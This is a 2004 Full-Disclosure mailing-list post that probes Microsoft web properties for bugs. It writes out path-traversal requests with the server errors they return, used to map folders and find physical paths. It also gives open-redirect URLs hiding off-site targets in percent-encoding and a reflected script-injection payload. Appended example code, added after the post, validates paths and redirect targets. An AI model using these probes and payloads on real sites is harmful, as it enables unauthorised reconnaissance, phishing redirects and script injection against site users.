[Full-Disclosure] [Bug Proofing Microsoft.com with Internet Explorer ** Part I **]

From: Vizzy (vizzy_at_freemail.hu)
Date: 03/16/04

    To: full-disclosure@lists.netsys.com
    Date: Tue, 16 Mar 2004 03:47:10 +0000
    
    

    ===[Bug Proofing Microsoft.com with Internet Explorer ]===

    Disclaimer: All information contained here is based on the author's wild imagination
                and all real coincidences are accidental.
                Provided for educational purposes only.
                Also, be aware that the Microsoft site most likely won't explode
                (too good to be true, see Part II), but your IE easily could.

    Introduction:

    So, where are we going today? All roads lead to www.microsoft.com, the powerful home of the most
    secure operating system. Ever.

    But should THE SITE be the tightest one, to demonstrate to us the
    powerful feeling of security and happiness? Or is it OK to have a glitch
    or two unless someone notices?

    So -- who cares? The company whose security profile is the security of its operating systems.
    The security of our homes (hopefully not all of us live in M$ boxes).

    Ok, enough talking, let's see what we can phish with our handy browser..

    Before we start, point your browsers to
    http://www.microsoft.com/isapi/gomscom.asp
    to remind yourself how the Microsoft site looked back in 1997,
    when Microsoft had no chance to hire some good web designers, because
    the most insecure and unstable but pretentious operating system was just
    about to be released..

    =============[* Part I: Bogus URL's:]=================================

    *********
    **URL 1**
    *********

    Browsing MSDN I came across the following URL:

    http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/winsock_functions.asp

    The page uses frames and one of them contains "library/en-us/winsock/winsock/winsock_functions.asp"
    Ok, let's play with the URL a bit:
    http://msdn.microsoft.com/library/default.asp?url=/library/../library/en-us/winsock/winsock/winsock_functions.asp
    Returns us the same page. Same result. Can we change folders?..

    Trying to guess parent folder name:
    http://msdn.microsoft.com/library/default.asp?url=/library/../../msdn/library/en-us/winsock/winsock/winsock_functions.asp
    > Page not found
    http://msdn.microsoft.com/library/default.asp?url=/library/../../wwwroot/library/en-us/winsock/winsock/winsock_functions.asp
    > Page not found

    Ok.. no luck.. but how about:
    http://msdn.microsoft.com/library/default.asp?url=/../c:/library/en-us/winsock/winsock/winsock_functions.asp
    > The system cannot find the file specified.

    Hmm..

    http://msdn.microsoft.com/library/default.asp?url=/../c:/boot.ini
    > The system cannot find the file specified.
    This looks like a Windows error message!
    Why? It's not here?:O

    I would be surprised if it was..
    Tried some other default names but without luck.
    Let's leave this URL for now as I found a better one:

    *********
    **URL 2**
    *********

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=

    let's play a bit with 'dtcfg' parameter:

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..
    > msxml3.dll error '80070005'
    > Access is denied.
    > /library/shared/deeptree/asp/contentbar.asp, line 12

    Hmm.. Interesting.

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg="
    > Server.MapPath() error 'ASP 0173 : 80004005'
    > Invalid Path Character
    > /library/shared/deeptree/asp/contentbar.asp, line 12
    > An invalid character was specified in the Path parameter for the MapPath method.

    Nice. So we control the input to the Server.MapPath() function, but what is it and
    what does it do?
    Google answers: the function takes one argument, a virtual path, and returns the
    corresponding physical path.

    Right:
    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=c:\
    > Server.MapPath() error 'ASP 0172 : 80004005'
    > Invalid Path
    > /library/shared/deeptree/asp/contentbar.asp, line 12
    > The Path parameter for the MapPath method must be a virtual path. A physical path was used.

    Just to be sure.

    Ok, our perspective?

    It looks like we are dealing with something like:
    lala.ReadXml(Server.MapPath("$dtcfg"));

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\
    > msxml3.dll error '80070005'
    > Access is denied.
    > /library/shared/deeptree/asp/contentbar.asp, line 12

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\
    > Microsoft JScript runtime error '800a138f'
    > 'oXDoc.documentElement' is null or not an object
    > /library/shared/deeptree/asp/contentbar.asp, line 40

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\..\
    > Server.MapPath() error 'ASP 0176 : 80004005'
    > Path Not Found
    > /library/shared/deeptree/asp/contentbar.asp, line 12
    > The Path parameter for the MapPath method did not correspond to a known path.

    Looks like we are 5 levels deep from root directory.

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml

    OK, leaving it..

    *********
    **URL 3**
    *********

    http://www.microsoft.com/library/shared/searchtab/search.asp

    Sneaking into source:

    <FORM id="frmSearch2" target="_top" name="frmSearch2" action="/library/shared/searchtab/searchHandoff.asp" method="get">
    <INPUT TYPE="HIDDEN" name="handoffurl" value="http://search.microsoft.com/us/dev/default.asp">
    <INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/library/shared/searchtab/cnfg.xml">
                                            ^^^^^^ oops!
          
    So it looks like the great site of Microsoft is hosted on drive D:!
    But -- let's try to verify that..

    One of the pages already known to us.. With an existing XML file name it is:
    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/shared/searchtab/cnfg.xml
    Shows us nice skyblue screen.

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../library/shared/searchtab/cnfg.xml
    Ok, browsing works..

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml
    Works again! So it is indeed located in "HTTP" parent folder.

    To be 100% sure, let's try non-existent name and see what happens:
    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../hxxp/library/shared/searchtab/cnfg.xml
    > Microsoft JScript runtime error '800a138f'
    > 'oXDoc.documentElement' is null or not an object
    > /library/shared/deeptree/asp/contentbar.asp, line 40
    Yeah, our assumptions were right.

    /*
    As it appeared later, there are plenty of places where the physical path is exposed. Like:
     <INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/mscorp/worldwide/spanish/msdn/cnfg.xml">
    */

    Now we can use this URL to probe folders in the root web folder:

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/help/
    > Microsoft JScript runtime error '800a138f'
    > 'oXDoc.documentElement' is null or not an object
    > /library/shared/deeptree/asp/contentbar.asp, line 40
    Folder does not exist.

    http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/info/
    > msxml3.dll error '80070005'
    > Access is denied.
    > /library/shared/deeptree/asp/contentbar.asp, line 12
    Folder exists.

    .... etc

    http://www.microsoft.com/library/shared/searchtab/searchHandoff.asp?handoffurl=http://ddd.com/ddd.asp&stcfg=default.asp&qu=123&btnSearch=GO
    > strScopeId1
    > sltSearchListundefined
    > Microsoft JScript runtime error '800a01a8'
    > Object required
    > /library/shared/searchtab/searchHandoff.asp, line 90

    *********
    **URL 4**
    *********

    "Can anybody tell me where am I?"

    Are we at Microsoft.com or what?
    http://msdn.microsoft.com/vcsharp/default.aspx?pull=%68%74%74%70%3a%2f%2f%66%75%63%6b%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d
    http://help.msn.com/EN_US/external.asp?topic=%67%6f%6f%67%6c%65%2e%63%6f%6d

    I thought I downloaded security update from M$?! (R)

    Now, how about securely signing up to your Passport?
    https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d

    Oh, well.. and last, but not least..

    let's get some JavaScript running on the Microsoft site:
    http://www.microsoft.com/norge/news/archive.asp?y=1997%3Cscript%3Ealert('Its%20warmer%20in%20here..:)');%3C/script%3E%3C!--

        *** with more critical bugs...
                  to be continued in Part II: .......

        

    -- 
    have phun,
     Vizzy    
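Added example, not part of the post above: the input validation a classic-ASP page like contentbar.asp should apply to a user-supplied virtual path such as dtcfg before handing it to Server.MapPath(). It is plain JavaScript so it runs under Node and reads like server-side JScript; the allowed folder "/library/shared/" and the ".xml" restriction are assumptions, not something the post states.

```javascript
// Added example (not the original post's code). Mirrors what contentbar.asp
// should do with "dtcfg": reject physical paths, any ".." segment, bad
// characters, and anything outside one allowed virtual folder, so that
// the MapPath error messages the post uses as a folder oracle never fire.
var ALLOWED_ROOT = "/library/shared/";   // assumption: where the config XML lives

// Lexically normalize a virtual path the way a lenient server might:
// forward slashes only, leading slash, "." and ".." segments resolved.
function normalizeVirtual(input) {
  var s = String(input).replace(/\\/g, "/");
  if (s.charAt(0) !== "/") s = "/" + s;
  var out = [];
  var parts = s.split("/");
  for (var i = 0; i < parts.length; i++) {
    var p = parts[i];
    if (p === "" || p === ".") continue;
    if (p === "..") { out.pop(); continue; }
    out.push(p);
  }
  return "/" + out.join("/");
}

// Returns the canonical virtual path if the input is acceptable, else null.
// The page should then serve a default config instead of calling MapPath.
function safeVirtualPath(input) {
  var raw = String(input);
  if (raw.length === 0) return null;
  if (/^[A-Za-z]:/.test(raw) || /^\\\\/.test(raw)) return null; // drive letter / UNC (ASP 0172)
  if (/[\0"<>|*?]/.test(raw)) return null;                      // e.g. '"' gives ASP 0173
  if (/(^|[\/\\])\.\.([\/\\]|$)/.test(raw)) return null;        // any ".." segment, even if it
                                                                //  would resolve back inside
  var canon = normalizeVirtual(raw);
  if (canon.indexOf(ALLOWED_ROOT) !== 0) return null;           // outside the allowed folder
  if (!/\.xml$/i.test(canon)) return null;                      // only config XML files
  return canon;
}
```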
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    
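Added example, not from the post: validating a redirect target such as the pull, topic or cbru parameters shown in URL 4. The post's payloads are percent-encoded absolute URLs, so the check decodes first (as Request.QueryString would), then parses the result against the site's own origin and an allow-list of hosts. SITE_ORIGIN and ALLOWED_HOSTS are placeholders, not values from the page.

```javascript
// Added example (not the original post's code): open-redirect guard for a
// user-supplied "return to" parameter. Placeholders below are assumptions.
var SITE_ORIGIN = "https://www.example.test";                   // the site's own origin
var ALLOWED_HOSTS = ["www.example.test", "help.example.test"];  // hosts we may send users to

// Returns a safe absolute URL on an allowed host, or null so the caller
// falls back to the site's default page instead of redirecting.
function safeRedirectTarget(param) {
  var decoded;
  try {
    decoded = decodeURIComponent(String(param));   // "%68%74%74%70%3a..." -> "http://..."
  } catch (e) {
    return null;                                    // malformed percent escape
  }
  // Some handlers decode twice; decode again only if escapes remain so the
  // check sees the same string the redirect would actually use.
  if (/%[0-9A-Fa-f]{2}/.test(decoded)) {
    try { decoded = decodeURIComponent(decoded); } catch (e) { return null; }
  }
  decoded = decoded.replace(/[\u0000-\u001F\u007F]/g, "");      // drop control characters
  var target;
  try {
    target = new URL(decoded, SITE_ORIGIN);         // relative paths resolve to our own origin
  } catch (e) {
    return null;                                    // unparsable
  }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null; // javascript:, data:
  if (ALLOWED_HOSTS.indexOf(target.hostname.toLowerCase()) === -1) return null;  // off-site host
  if (target.username || target.password) return null;  // "https://www.example.test@evil/" tricks
  return target.href;
}
```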
